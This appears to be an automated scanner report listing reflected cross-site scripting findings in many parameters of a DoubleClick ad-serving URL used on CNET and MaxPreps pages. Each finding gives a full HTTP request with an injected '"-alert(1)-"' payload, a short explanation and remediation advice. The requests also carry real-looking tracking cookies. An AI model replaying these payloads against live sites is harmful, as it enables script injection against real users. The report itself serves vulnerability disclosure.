GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=774ba"-alert(1)-"1c1e8698a2b&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f345"-alert(1)-"b2fb05949b9 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com8f345"-alert(1)-"b2fb05949b9&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27004"-alert(1)-"3fe778b37d7 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=227004"-alert(1)-"3fe778b37d7&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90749"-alert(1)-"bd70542fbf4 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com90749"-alert(1)-"bd70542fbf4&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e268c"-alert(1)-"b3701dcf994 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIYe268c"-alert(1)-"b3701dcf994&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f195c"-alert(1)-"03178e8094f was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=f195c"-alert(1)-"03178e8094f&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d49"-alert(1)-"ca206ba6f6e was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=10029d49"-alert(1)-"ca206ba6f6e&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b462d"-alert(1)-"1f41ecccafb was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=b462d"-alert(1)-"1f41ecccafb&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec23f"-alert(1)-"794881e6562 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301ec23f"-alert(1)-"794881e6562&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fa0"-alert(1)-"8d5087bf226 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.24355fa0"-alert(1)-"8d5087bf226&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1899"-alert(1)-"373caf14283 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8c1899"-alert(1)-"373caf14283&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e634d"-alert(1)-"dc172a7f5be was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977e634d"-alert(1)-"dc172a7f5be&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bfb4"-alert(1)-"6b063d0056b was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=31bfb4"-alert(1)-"6b063d0056b&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5021a"-alert(1)-"730b02f3fc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=193805021a"-alert(1)-"730b02f3fc2&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page ...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193805021a"-alert(1)-"730b02f3fc2&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppart ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b06"-alert(1)-"26dad3ac539 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4538b06"-alert(1)-"26dad3ac539&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e0fe"-alert(1)-"ff95fe7b18f was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=645e0fe"-alert(1)-"ff95fe7b18f&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
